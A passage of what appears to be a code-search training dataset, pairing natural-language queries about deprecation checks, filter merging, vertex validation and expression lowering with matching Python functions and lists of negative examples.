"def get_all_services():\n global tts_srv\n tts_srv = QI_SESSION.service(\"ALTextToSpeech\")\n\n global al_srv\n al_srv = QI_SESSION.service(\"ALAutonomousLife\")\n\n global ba_srv\n ba_srv = QI_SESSION.service(\"ALBasicAwareness\")\n\n global ab_srv\n ab_srv = QI_SESSION.service(\"ALAutonomousBlinking\")\n\n global motion_srv\n motion_srv = QI_SESSION.service(\"ALMotion\")\n\n global video_srv\n video_srv = QI_SESSION.service(\"ALVideoDevice\")\n\n global tablet_srv\n tablet_srv = QI_SESSION.service(\"ALTabletService\")\n\n global as_srv\n as_srv = QI_SESSION.service(\"ALAnimatedSpeech\")\n\n global ap_srv\n ap_srv = QI_SESSION.service(\"ALAnimationPlayer\")\n\n global posture_srv\n posture_srv = QI_SESSION.service(\"ALRobotPosture\")\n\n global ar_srv\n ar_srv = QI_SESSION.service(\"ALAudioRecorder\")\n\n global ad_srv\n ad_srv = QI_SESSION.service(\"ALAudioDevice\")\n\n global fd_srv\n fd_srv = QI_SESSION.service(\"ALFaceDetection\")\n\n global mem_srv\n mem_srv = QI_SESSION.service(\"ALMemory\")\n\n global lm_srv\n lm_srv = QI_SESSION.service(\"ALListeningMovement\")\n\n global sm_srv\n sm_srv = QI_SESSION.service(\"ALSpeakingMovement\")\n\n global audio_player\n audio_player = QI_SESSION.service(\"ALAudioPlayer\")\n\n global led_srv\n led_srv = QI_SESSION.service(\"ALLeds\")",
"def getServiceNames(self):\n self.send_getServiceNames()\n return self.recv_getServiceNames()",
"def _all_services(type_, *args, **kwargs):\n return all_srvs[type_]",
"def get_all_services(limit=None, columns=None, extra_filter=None):\n return query(\"GET services\\n\", limit=limit, columns=columns, \n item_type=\"services\" , extra_filter=extra_filter)",
"def list(cls, context, limit=None, marker=None, sort_key=None,\n sort_dir=None, filters=None):\n db_webservices = cls.dbapi.get_webservice_list(filters=filters,\n limit=limit,\n marker=marker,\n sort_key=sort_key,\n sort_dir=sort_dir)\n return [Webservice._from_db_object(cls(context), obj)\n for obj in db_webservices]",
"def get_all_service_info(self):\n result = []\n\n for k in self.service_information.keys():\n ip = k\n for p in self.service_information[k].keys():\n proto, port = p.split(\"/\")\n service_list = self.service_information[k][p]\n status = service_list[0]\n service = service_list[1]\n service_info = service_list[2]\n result.append({\n 'ip': str(ipaddress.IPv4Address(ip)), \n 'proto': proto, \n 'port': port, \n 'status': status, \n 'service': service,\n 'service_info': service_info\n })\n\n return result",
"def parse_services(self):\n #Client\n for item in self.client_config.get(\"services\"):\n service = Service(item[\"name\"],type=item[\"type\"],parameters=item)\n self.client_services_list.append(service) \n\n #Server\n for item in self.server_config.get(\"services\"):\n service = Service(item[\"name\"],type=item[\"type\"],parameters=item)\n self.server_services_list.append(service)",
"def GetServices(self):\n return json.dumps(SERVICES)",
"def get_availables_services(self):\r\n self._service_locator.get_availables_services()",
"def get_clients_services_info(self):\n with self.clients_lock:\n return [c.get_services_info() for c in self.clients]",
"def _QueryServices(self):\n init_prop_header = 'init.svc.'\n props = self._Props()\n return dict([(k[len(init_prop_header):], v) for k, v in props.iteritems()\n if k.startswith(init_prop_header)])",
"def service_names(self):\n return self.services.keys()",
"def test_get_services(self):\n # Create a few application endpoints.\n ezdiscovery.register_endpoint('foo', 'bar', 'localhost', 8000)\n ezdiscovery.register_endpoint('foo', 'baz', 'localhost', 8001)\n ezdiscovery.register_endpoint('harry', 'sally', 'localhost', 8080)\n\n # Make sure it returns the right count for a single service.\n self.assertEqual(2, len(ezdiscovery.get_services('foo')))\n\n self.assertEqual(1, len(ezdiscovery.get_services('harry')))\n self.assertEqual('sally', ezdiscovery.get_services('harry')[0])",
"def get(self):\n return getServicesByVendor(self)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Says if a URI of a data collection is deprecated.
|
def isDeprecated(self, uri):
res = self.serv.isDeprecated(uri)
res = self._boolean_convertor(res)
return res
|
[
"def _is_deprecated(self, api_node: doc_generator_visitor.ApiTreeNode):\n if doc_controls.is_deprecated(api_node.py_object):\n return True\n\n decorator_list = signature.extract_decorators(api_node.py_object)\n if any('deprecat' in dec for dec in decorator_list):\n docstring = getattr(api_node.py_object, '__doc__') or ''\n return 'THIS FUNCTION IS DEPRECATED' in docstring\n\n return False",
"def deprecated(self):\n self._deprecated = True\n return self",
"def deprecated(self):\n return self.data['record']['Deprecated'] if 'Deprecated' in self.data['record'] else None",
"def _is_valid_deprecated(self, location, generated_attribute, generated_attribute_info):\n if DEPRECATED in generated_attribute_info:\n self._add_warning(location, WARN_ATTRIBUTE_DEPRECATED, message=generated_attribute_info[DEPRECATED],\n attribute=generated_attribute)\n return False\n return True",
"def test_loreDeprecation(self):\r\n reflect.namedAny(\"twisted.lore\")\r\n warningsShown = self.flushWarnings()\r\n self.assertEqual(1, len(warningsShown))\r\n self.assertEqual(\r\n \"twisted.lore was deprecated in Twisted 14.0.0: \"\r\n \"Use Sphinx instead.\", warningsShown[0]['message'])",
"def storage_deprecation_warning():\n\n warnings.warn(message='Storage \"client_standart\" is deprecated and will be removed. Use \"client_standard\" instead.',\n category=DeprecationWarning)",
"def test_getDeprecationDocstring(self):\n version = Version(\"Twisted\", 8, 0, 0)\n self.assertEqual(\n \"Deprecated in Twisted 8.0.0.\", _getDeprecationDocstring(version, \"\")\n )",
"def isObsolete(self) -> bool:\n ...",
"def test_urlDeprecation(self):\n from twisted.python import url\n url\n\n warningsShown = self.flushWarnings([self.test_urlDeprecation])\n self.assertEqual(1, len(warningsShown))\n self.assertEqual(\n (\"twisted.python.url was deprecated in Twisted 17.5.0:\"\n \" Please use hyperlink from PyPI instead.\"),\n warningsShown[0]['message'])",
"def test_deprecated(self):\n @misc.deprecated\n def function():\n return 1, None\n \n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n # test whether the function still works\n self.assertEqual(function(), (1, None))\n # test whether a warning was emitted\n self.assertEqual(len(w), 1)\n self.assertTrue(issubclass(w[-1].category, DeprecationWarning))\n self.assertIn(\"deprecated\", str(w[-1].message))",
"def test_old_argument_deprecation(self):\n post_data = {\n 'nick': 'johndoe',\n }\n cnt = Person.objects.count()\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n response = self.client.post(reverse('admin:admin_custom_urls_person_add'), post_data)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Person.objects.count(), cnt + 1)\n # We should get a DeprecationWarning\n self.assertEqual(len(w), 1)\n self.assertTrue(isinstance(w[0].message, DeprecationWarning))",
"def test_methodIsDeprecated(self):\n sslverify.OpenSSLCertificateOptions(\n privateKey=self.sKey,\n certificate=self.sCert,\n method=SSL.SSLv23_METHOD,\n )\n\n message = (\"Passing method to twisted.internet.ssl.CertificateOptions \"\n \"was deprecated in Twisted 17.1.0. Please use a \"\n \"combination of insecurelyLowerMinimumTo, raiseMinimumTo, \"\n \"and lowerMaximumSecurityTo instead, as Twisted will \"\n \"correctly configure the method.\")\n\n warnings = self.flushWarnings([self.test_methodIsDeprecated])\n self.assertEqual(1, len(warnings))\n self.assertEqual(DeprecationWarning, warnings[0]['category'])\n self.assertEqual(message, warnings[0]['message'])",
"def test_deprecatedUpdatesDocstring(self):\n\n def localDummyCallable():\n \"\"\"\n Do nothing.\n\n This is used to test the deprecation decorators.\n \"\"\"\n\n version = Version(\"Twisted\", 8, 0, 0)\n dummy = deprecated(version)(localDummyCallable)\n\n _appendToDocstring(localDummyCallable, _getDeprecationDocstring(version, \"\"))\n\n self.assertEqual(localDummyCallable.__doc__, dummy.__doc__)",
"def test_legacy_deprecated(recwarn):\n warnings.simplefilter('always')\n from luma.led_matrix import legacy\n\n assert len(recwarn) == 1\n w = recwarn.pop(DeprecationWarning)\n\n assert str(w.message) == legacy.deprecation_msg",
"def is_deprecated_look_in_description(property_dict: Dict[str, Any]) -> bool:\n if DESCRIPTION not in property_dict:\n return False\n\n return bool(re.match(DEPRECATED_PATTERN, property_dict[DESCRIPTION]))",
"def deprecated():\n\n def wrapper(func):\n @wraps(func)\n def wrapped(self, *args, **kwargs):\n (data, code, headers) = unpack(func(self, *args, **kwargs))\n headers[\"Deprecation\"] = \"true\"\n\n return (data, code, headers)\n\n return wrapped\n\n return wrapper",
"def test_getDeprecationWarningString(self):\n version = Version(\"Twisted\", 8, 0, 0)\n self.assertEqual(\n getDeprecationWarningString(self.test_getDeprecationWarningString, version),\n \"%s.DeprecationWarningsTests.test_getDeprecationWarningString \"\n \"was deprecated in Twisted 8.0.0\" % (__name__,),\n )",
"def key_is_deprecated(self, full_key):\n if full_key in self.__dict__[Map.DEPRECATED_KEYS]:\n print(\"Deprecated config key (ignoring): {}\".format(full_key))\n return True\n return False",
"def query_deprecate(self, req):\n self.assert_is_internal(req)\n data = req.json\n nodes = data['other']\n self_name = data['name']\n new_node = data['new']\n backups = data['backups']\n ring = HashRing(nodes + [new_node])\n deprecated = []\n for domain, username, bucket in self.storage.all_dbs():\n assert bucket.startswith('/')\n path = '/' + domain + '/' + username + bucket\n iterator = iter(ring.iterate_nodes(path))\n active_nodes = [iterator.next() for i in xrange(backups + 1)]\n deprecated_node = iterator.next()\n if deprecated_node == self_name and new_node in active_nodes:\n deprecated.append(\n {'path': path, 'domain': domain, 'username': username, 'bucket': bucket})\n db = self.storage.for_user(domain, username, bucket)\n db.deprecate()\n return Response(json={'deprecated': deprecated})"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Merge consecutive Filter(x), Filter(y) blocks into Filter(x && y) block.
|
def merge_consecutive_filter_clauses(ir_blocks):
if not ir_blocks:
return ir_blocks
new_ir_blocks = [ir_blocks[0]]
for block in ir_blocks[1:]:
last_block = new_ir_blocks[-1]
if isinstance(last_block, Filter) and isinstance(block, Filter):
new_ir_blocks[-1] = Filter(
BinaryComposition(u'&&', last_block.predicate, block.predicate))
else:
new_ir_blocks.append(block)
return new_ir_blocks
|
[
"def _filter_chain(accumulated, additional):\n return lambda block_key: accumulated(block_key) and additional(block_key)",
"def filter_fir_shared(clock, reset, x, y, b):\n assert isinstance(x, Samples)\n assert isinstance(y, Samples)\n\n ntaps = len(b)\n scnt = Signal(intbv(ntaps+1, min=0, max=ntaps+2))\n pmax = x.data.max * x.data.max\n sop = Signal(intbv(0, min=-pmax, max=pmax))\n scale = int(len(x.data)-1)\n\n xd = [Signal(intbv(0, min=x.data.min, max=x.data.max))\n for _ in range(len(b))]\n\n @always_seq(clock.posedge, reset=reset)\n def beh_sop():\n y.valid.next = False\n if scnt == ntaps+1 and x.valid:\n # tap update loop\n xd[0].next = x.data\n for ii in range(1, len(b)-1):\n xd[ii].next = xd[ii-1]\n # compute the first product \n c = b[0]\n sop.next = c * x.data\n scnt.next = 1\n elif scnt == ntaps:\n assert not x.valid\n y.data.next = sop >> scale\n y.valid.next = True\n scnt.next = scnt + 1\n elif scnt < ntaps:\n assert not x.valid\n c = b[scnt]\n sop.next = sop + c * xd[scnt]\n scnt.next = scnt + 1\n\n return hdl.instances()",
"def filter_cascade(filters):\n def newFilter(image):\n for f in filters:\n image = f(image)\n return image\n return newFilter",
"def _transform_with_filters(self, block_structure):\n if not self._transformers['supports_filter']:\n return\n\n filters = []\n for transformer in self._transformers['supports_filter']:\n filters.extend(transformer.transform_block_filters(self.usage_info, block_structure))\n\n combined_filters = combine_filters(block_structure, filters)\n block_structure.filter_topological_traversal(combined_filters)",
"def concat_transition_block(\n self, x: tf.Tensor, filters: int, strides: int, use_squeeze_and_excite: bool\n ) -> tf.Tensor:\n infilters = int(x.shape[-1])\n assert filters == 2 * infilters\n\n residual = tf.keras.layers.MaxPool2D(pool_size=strides, strides=strides)(x)\n residual = tf.keras.layers.BatchNormalization(momentum=0.9, epsilon=1e-5)(\n residual\n )\n x = self.conv_block(x, infilters, use_squeeze_and_excite, strides)\n x = tf.keras.layers.add([x, residual])\n\n return tf.keras.layers.concatenate([residual, x])",
"def filter_iir(aIIRfilterList, bIIRfilterList, x):\n if len(aIIRfilterList[0]) == 3: # second-order sections:\n sos = [list(b) + list(a) for a, b in zip(aIIRfilterList,\n bIIRfilterList)]\n y = signal.sosfilt(sos, x)\n else:\n y = x\n for a, b in zip(aIIRfilterList, bIIRfilterList):\n y = signal.lfilter(b, a, y)\n return y",
"def two_image_filter( image1, image2 ):\n pass",
"def combine_filters(*args):\n def func(rec):\n for filt in args:\n if not filt(rec):\n return False\n return True\n return func",
"def gaborFilteringConcat(image, kernels):\n\n\tcvEqualizeHist(image,image)\n\tsrc_f = cvCreateImage(cvSize(image.width,image.height),IPL_DEPTH_32F,1)\n\tcvConvertScale(image,src_f,1.0/255)\n\n\tdest = cvCloneImage(src_f)\n\tdest_mag = cvCloneImage(src_f)\n\timg_aux = cvCreateImage(cvSize(image.width,image.height),IPL_DEPTH_8U, 1)\n\timg_total = cvCreateImage(cvSize(len(kernels)*image.width,image.height),IPL_DEPTH_8U, 1)\n\n\ti=0\n\tfor k in kernels:\n\t\tcvFilter2D(src_f, dest,k,cvPoint(-1,-1))\n\t\tcvPow(dest,dest_mag,2)\n\t\tcvZero(img_aux)\n\n\t\tcvConvertScale(dest, img_aux, 255.0)\n\t\tcvCopy(img_aux, cvGetSubRect(img_total,cvRect(i*img_aux.width,0,img_aux.width,img_aux.height)))\n\t\ti+=1\n\n\tcvSmooth(img_total,img_total)\n\tcvThreshold(img_total, img_total, 16, 255, CV_THRESH_BINARY)\n\n\treturn img_total",
"def merge_all_adjacent(self):\r\n for i in range(data.windows.__len__()):\r\n while self.mergeable(i,i+1):\r\n self.merge(i,i+1,False,False)\r\n self.reload()",
"def deinterlace(self, raw):\r\n\r\n # print >> sys.stderr, (\"Reading interlaced, w=%s, r=%s, planes=%s,\" +\r\n # \" bpp=%s\") % (self.width, self.height, self.planes, self.bps)\r\n \r\n flt_list = [self.ifilter0, self.ifilter1, self.ifilter2, self.ifilter3, self.ifilter4]\r\n # Values per row (of the target image)\r\n vpr = self.width * self.bpp\r\n\r\n # Make a result array, and make it big enough. Interleaving\r\n # writes to the output array randomly (well, not quite), so the\r\n # entire output array must be in memory.\r\n # fmt = 'BH'[self.bitdepth > 8]\r\n # a = array(fmt, [0]*vpr*self.height)\r\n source_offset = 0\r\n\r\n # after = [[0]*vpr] * self.height\r\n after = []\r\n for i in range(self.height):\r\n after.append([0]*vpr)\r\n \r\n for xstart, ystart, xstep, ystep in self._adam7:\r\n \r\n if xstart >= self.width:\r\n continue\r\n \r\n # Pixels per row (reduced pass image)\r\n ppr = int(math.ceil((self.width-xstart)/float(xstep)))\r\n row_size = int(math.ceil(self.bpp * ppr))\r\n recon = [0] * row_size\r\n for y in range(ystart, self.height, ystep):\r\n filter_type = raw[source_offset]\r\n source_offset += 1\r\n scanline = [ord(b) for b in raw[source_offset:source_offset+row_size]]\r\n source_offset += row_size\r\n recon = flt_list[ord(filter_type)](scanline,recon,self.bpp)\r\n if xstep == 1 and xstart==0:\r\n after[y][0:vpr] = recon[0:vpr]\r\n else:\r\n reconIndex = 0\r\n for xpos in range(xstart,self.width,xstep):\r\n after[y][xpos*self.bpp:xpos*self.bpp+self.bpp] = recon[reconIndex*self.bpp:reconIndex*self.bpp+self.bpp]\r\n reconIndex += 1\r\n \r\n return after",
"def test_run_filters_sequentially(self):\n def first_filter(model: AnalyticsEventModel):\n model.ExtraData[\"key\"] = \"firstFilter\"\n\n def last_filter(model: AnalyticsEventModel):\n model.ExtraData[\"key\"] = \"lastFilter\"\n\n event_model = create_event_model()\n last_filter(event_model)\n\n result = self.dispatcher.extend(with_filter(first_filter), with_filter(last_filter)).dispatch(EVENT_NAME)\n\n self.assertEqual(result.get(), RETURN_VALUE)\n self.event_model_writer.assert_called_once_with(event_model)",
"def filterMultiRunstop(events):\n filters = []\n filters.append( UndervoltageMerge() )\n filters.append( RunstopMerge() )\n filters.append( MultiRunstopMerge() )\n filters.append( KeepEventTypes(['MultiRunstopMerge']) )\n return runFilters(filters,events)",
"def __call__(self, sample_block: np.ndarray) -> List[Dict[Tuple[int, int], float]]:\n\n assert len(sample_block) == self._sample_rate\n buffered_sample_block = self._buffer_sample_block(sample_block)\n\n shared_sample_block = np.ndarray(\n (len(buffered_sample_block),),\n dtype=np.float32,\n buffer=self.shared_sample_block_memory.buf,\n )\n\n shared_sample_block[:] = buffered_sample_block[:]\n\n # tell children to get to work\n for bandpass_filter in self._bandpass_filters.values():\n bandpass_filter()\n LOGGER.debug(\"all filters processing\")\n\n # collect the results into a list\n bin_intensities_list: List[Tuple[Tuple[int, int], np.ndarray]] = []\n for bin_, bandpass_filter in self._bandpass_filters.items():\n intensity_list = []\n filtered_sample_block = bandpass_filter.result\n\n # split filtered samples into buffers\n for buffer in filtered_sample_block.reshape(\n int(len(filtered_sample_block) / self._buffer_size), self._buffer_size\n ):\n energy = float(dsp.get_rms(buffer))\n max_energy = bandpass_filter.max_energy_tracker(energy)\n if not max_energy:\n intensity = 0\n else:\n intensity = energy / max_energy\n intensity_list.append(intensity)\n bin_intensities_list.append((bin_, np.array(intensity_list)))\n LOGGER.debug(\"all results recieved\")\n\n # filterbanks return a random order, sort them into a 2d array\n bin_intensities_list.sort()\n bin_intensities_array = np.zeros(\n (len(bin_intensities_list), len(bin_intensities_list[0][1])),\n dtype=bin_intensities_list[0][1].dtype,\n )\n for i, (_, intensities) in enumerate(bin_intensities_list):\n bin_intensities_array[i] = intensities[:]\n\n # create a bin-intensity mapping for each buffer\n bin_intensity_mapping_list = []\n for intensity_array in bin_intensities_array.swapaxes(0, 1):\n bin_intensity_mapping = {}\n for bin_, intensity in zip(self._bandpass_filters, intensity_array):\n bin_intensity_mapping[bin_] = float(intensity)\n bin_intensity_mapping_list.append(bin_intensity_mapping)\n\n return bin_intensity_mapping_list",
"def preprocess_filters(x, Fs):\n # Low pass at 200Hz\n x_lo = neurodsp.filter(x, Fs, 'lowpass', f_lo=200, N_seconds=.1)\n\n # Highpass at 2Hz - figure out order\n x_hi = neurodsp.filter(x_lo, Fs, 'highpass', f_hi=2, N_seconds=2)\n\n # Notch filter at 60Hz, 120Hz and 180Hz\n N_seconds = .5\n x_notch = neurodsp.filter(x_hi, Fs, 'bandstop', f_lo=58, f_hi=62, N_seconds=N_seconds)\n x_notch = neurodsp.filter(x_notch, Fs, 'bandstop', f_lo=118, f_hi=122, N_seconds=N_seconds)\n x_notch = neurodsp.filter(x_notch, Fs, 'bandstop', f_lo=178, f_hi=182, N_seconds=N_seconds)\n\n return x_notch",
"def _cpu_line_uniform_filter_without_loops(image, output, filter_size, parallelism=8):\n\n length = image.shape[0]\n chunk_length = int(ceil(length / parallelism))\n\n for c in prange(parallelism):\n for k in range(chunk_length):\n i = k + c * chunk_length\n if i < length:\n input_line = image[i, :]\n output_line = output[i, :]\n _cpu_line_filter(input_line, output_line, filter_size)\n\n # print(cpu_line_filter.inspect_llvm())",
"def fp_pointwise_transition_block(\n self, x: tf.Tensor, filters: int, strides: int, use_squeeze_and_excite: bool\n ) -> tf.Tensor:\n residual = tf.keras.layers.MaxPool2D(pool_size=strides, strides=strides)(x)\n residual = tf.keras.layers.Conv2D(\n filters, kernel_size=1, use_bias=False, kernel_initializer=\"glorot_normal\"\n )(residual)\n residual = tf.keras.layers.BatchNormalization(momentum=0.9, epsilon=1e-5)(\n residual\n )\n x = self.conv_block(x, filters, use_squeeze_and_excite, strides)\n return tf.keras.layers.add([x, residual])",
"def transform_block_filters(self, usage_info, block_structure):\n raise NotImplementedError",
"def stack(x, filters, n, downsampling, name=None):\n\n x = block(x, filters, downsampling, name=f\"{name}_block1\")\n for i in range(2, n + 1):\n x = block(x, filters, downsampling=False, name=f\"{name}_block{i}\")\n return x",
"def stream_forward(\n self, x: torch.Tensor, buffers: dict\n ) -> Tuple[torch.Tensor, dict]:\n assert x.size(0) == x.size(2) == 1\n # Just copying dict items, no tensors involved\n buffers = buffers.copy()\n skip_shape = (1, self.skip_channels, 1)\n skip = torch.zeros(skip_shape, dtype=x.dtype, device=x.device)\n x = self.input_conv(x)\n\n for i, block in enumerate(self.blocks):\n assert x.size(2) == 1\n residual = x\n\n dilated_outs = {}\n for sub in (\"gate\", \"filter\"):\n key = f\"block-{i}-{sub}\"\n dilated_outs[sub], buffers[key] = self.lazy_conv(\n x, block[f\"{sub}_conv\"], buffers[key], block.meta.dilation\n )\n\n filter_out = torch.tanh(dilated_outs[\"filter\"])\n gate_out = torch.sigmoid(dilated_outs[\"gate\"])\n x = filter_out * gate_out\n x_skip = block[\"skip_conv\"](x)\n skip += x_skip\n x = block[\"residual_conv\"](x)\n x = residual + x\n x = block[\"batch_norm\"](x)\n assert x.size(2) == 1\n\n out = self.output_convs(skip)\n buffers[\"out\"] = torch.cat((buffers[\"out\"][:, :, 1:], out), dim=2)\n buffers[\"out\"][:, :, 0] = 0\n assert buffers[\"out\"].size(2) == self.input_size\n out = self.output_dense(buffers[\"out\"])\n return out, buffers"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Validate that the OutputContextVertex is correctly representable.
|
def validate(self):
super(OutputContextVertex, self).validate()
if self.location.field is not None:
raise ValueError(u'Expected location at a vertex, but got: {}'.format(self.location))
|
[
"def validate(self, model_output_shape: Tuple, target_shape: Tuple) -> None:\n raise NotImplementedError",
"def is_vertex(self) -> \"bool\":\n return self._value.getType() == Value.VVAL",
"def is_vertex(ent):\n if isinstance(ent, tuple):\n if len(ent) in [2, 3]:\n return True\n elif isinstance(ent, Point):\n return True\n return False",
"def isConnectedToVertex(*args, **kwargs):\n \n pass",
"def _validate(self):\n # check that element connectivity contains integers\n # NOTE: this is neccessary for some plotting functionality\n if not np.issubdtype(self.t[0, 0], np.signedinteger):\n msg = (\"Mesh._validate(): Element connectivity \"\n \"must consist of integers.\")\n raise Exception(msg)\n # check that vertex matrix has \"correct\" size\n if self.p.shape[0] > 3:\n msg = (\"Mesh._validate(): We do not allow meshes \"\n \"embedded into larger than 3-dimensional \"\n \"Euclidean space! Please check that \"\n \"the given vertex matrix is of size Ndim x Nvertices.\")\n raise Exception(msg)\n # check that element connectivity matrix has correct size\n nvertices = {'line': 2, 'tri': 3, 'quad': 4, 'tet': 4, 'hex': 8}\n if self.t.shape[0] != nvertices[self.refdom]:\n msg = (\"Mesh._validate(): The given connectivity \"\n \"matrix has wrong shape!\")\n raise Exception(msg)\n # check that there are no duplicate points\n tmp = np.ascontiguousarray(self.p.T)\n if self.p.shape[1] != np.unique(tmp.view([('', tmp.dtype)]\n * tmp.shape[1])).shape[0]:\n msg = \"Mesh._validate(): Mesh contains duplicate vertices.\"\n warnings.warn(msg)\n # check that all points are at least in some element\n if len(np.setdiff1d(np.arange(self.p.shape[1]), np.unique(self.t))) > 0:\n msg = (\"Mesh._validate(): Mesh contains a vertex \"\n \"not belonging to any element.\")\n raise Exception(msg)",
"def get_out_vertex(self):",
"def _validateVertex(self, v):\n V = len(self._rank)\n if v < 0 or v >= V:\n raise Exception(\"vertex {} is not between 0 and {}\".format(v, (V-1))\n\n# Copyright 2002-2016, Robert Sedgewick and Kevin Wayne.\n# Copyright 2002-2016, DV Klopfenstein, Python port",
"def test_has_vert_filled_wrong(graph_one):\n assert graph_one.has_vert(\"X\") is False",
"def isVertex(self, x):\n if x < 0:\n raise ValidException(\"Invalid vertex.\")\n return x in self.__inbound_neighbours.keys()",
"def test_has_vert_filled(graph_one):\n\n assert graph_one.has_vert(\"C\") is True",
"def _validate_graph(self, G):\n for (v1, v2) in G.edges():\n if 'object' not in G.edges[v1, v2].keys():\n raise ValueError(\"edge_object for ({}, {}) is missing\".format(v1, v2))\n edge_object = G.edges[v1, v2]['object']\n if 'col' not in edge_object.keys():\n raise ValueError(\"edge_object for ({}, {}) is missing the 'col' field\".format(v1, v2))\n if 'lookup' not in edge_object.keys():\n raise ValueError(\"edge_object for ({}, {}) is missing the 'lookup' field\".format(v1, v2))\n if 'field' not in edge_object.keys():\n raise ValueError(\"edge_object for ({}, {}) is missing the 'field' field\".format(v1, v2))",
"def test_undirected_graph_vertex_already_exists(self):\n g = UndirectedGraph()\n g.add_vertex(v_val='v0')\n\n with self.assertRaises(ValueError):\n g.add_vertex(v_val='v0')",
"def has_vertex(self,v):\n return v in self.graph",
"def test_directed_graph_vertex_already_exists(self):\n g = DirectedGraph()\n g.add_vertex(v_val='v0')\n\n with self.assertRaises(ValueError):\n g.add_vertex('v0')",
"def valid_model_component(self):\n return True",
"def can_convert(self) -> bool:\n for w in self.required_weights:\n if w not in self.importer_node.weights:\n return False\n for attr in self.required_attributes:\n if attr not in self.importer_node.attributes:\n return False\n return True",
"def test_vertex_only(self):\n\n v = g.random((1000, 3))\n v[g.np.floor(g.random(90) * len(v)).astype(int)] = v[0]\n\n mesh = g.trimesh.Trimesh(v)\n\n assert len(mesh.vertices) < 950\n assert len(mesh.vertices) > 900",
"def testVertex(self):\n v = Vertex.makeVertex(1, 1, 1)\n self.assertEqual(1, v.X)\n self.assertEqual(Vector, type(v.Center()))",
"def _validate_edge(self, edge: Edge):\n\n # Validate that the nodes exist (edges may contain node paths, so we can't just check for nodes directly)\n try:\n from_node = self.get_node(edge.source.node_id)\n to_node = self.get_node(edge.destination.node_id)\n except NodeNotFoundError:\n raise InvalidEdgeError(\"One or both nodes don't exist: {edge.source.node_id} -> {edge.destination.node_id}\")\n\n # Validate that an edge to this node+field doesn't already exist\n input_edges = self._get_input_edges(edge.destination.node_id, edge.destination.field)\n if len(input_edges) > 0 and not isinstance(to_node, CollectInvocation):\n raise InvalidEdgeError(\n f\"Edge to node {edge.destination.node_id} field {edge.destination.field} already exists\"\n )\n\n # Validate that no cycles would be created\n g = self.nx_graph_flat()\n g.add_edge(edge.source.node_id, edge.destination.node_id)\n if not nx.is_directed_acyclic_graph(g):\n raise InvalidEdgeError(\n f\"Edge creates a cycle in the graph: {edge.source.node_id} -> {edge.destination.node_id}\"\n )\n\n # Validate that the field types are compatible\n if not are_connections_compatible(from_node, edge.source.field, to_node, edge.destination.field):\n raise InvalidEdgeError(\n f\"Fields are incompatible: cannot connect {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if iterator output type matches iterator input type (if this edge results in both being set)\n if isinstance(to_node, IterateInvocation) and edge.destination.field == \"collection\":\n if not self._is_iterator_connection_valid(edge.destination.node_id, new_input=edge.source):\n raise InvalidEdgeError(\n f\"Iterator input type does not match iterator output type: {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if iterator input type matches output type (if this edge results in both being set)\n if isinstance(from_node, IterateInvocation) and edge.source.field == \"item\":\n if not self._is_iterator_connection_valid(edge.source.node_id, new_output=edge.destination):\n raise InvalidEdgeError(\n f\"Iterator output type does not match iterator input type:, {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if collector input type matches output type (if this edge results in both being set)\n if isinstance(to_node, CollectInvocation) and edge.destination.field == \"item\":\n if not self._is_collector_connection_valid(edge.destination.node_id, new_input=edge.source):\n raise InvalidEdgeError(\n f\"Collector output type does not match collector input type: {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if collector output type matches input type (if this edge results in both being set)\n if isinstance(from_node, CollectInvocation) and edge.source.field == \"collection\":\n if not self._is_collector_connection_valid(edge.source.node_id, new_output=edge.destination):\n raise InvalidEdgeError(\n f\"Collector input type does not match collector output type: {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )",
"def is_vertex(self, vertex):\n\n return vertex in self.adjacency_dict.keys()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Lower ContextFieldExistence expressions into lowerlevel expressions.
|
def lower_context_field_existence(ir_blocks, query_metadata_table):
def regular_visitor_fn(expression):
"""Expression visitor function that rewrites ContextFieldExistence expressions."""
if not isinstance(expression, ContextFieldExistence):
return expression
location_type = query_metadata_table.get_location_info(expression.location).type
# Since this function is only used in blocks that aren't ConstructResult,
# the location check is performed using a regular ContextField expression.
return BinaryComposition(
u'!=',
ContextField(expression.location, location_type),
NullLiteral)
def construct_result_visitor_fn(expression):
"""Expression visitor function that rewrites ContextFieldExistence expressions."""
if not isinstance(expression, ContextFieldExistence):
return expression
location_type = query_metadata_table.get_location_info(expression.location).type
# Since this function is only used in ConstructResult blocks,
# the location check is performed using the special OutputContextVertex expression.
return BinaryComposition(
u'!=',
OutputContextVertex(expression.location, location_type),
NullLiteral)
new_ir_blocks = []
for block in ir_blocks:
new_block = None
if isinstance(block, ConstructResult):
new_block = block.visit_and_update_expressions(construct_result_visitor_fn)
else:
new_block = block.visit_and_update_expressions(regular_visitor_fn)
new_ir_blocks.append(new_block)
return new_ir_blocks
|
[
"def regular_visitor_fn(expression):\n if not isinstance(expression, ContextFieldExistence):\n return expression\n\n location_type = query_metadata_table.get_location_info(expression.location).type\n\n # Since this function is only used in blocks that aren't ConstructResult,\n # the location check is performed using a regular ContextField expression.\n return BinaryComposition(\n u'!=',\n ContextField(expression.location, location_type),\n NullLiteral)",
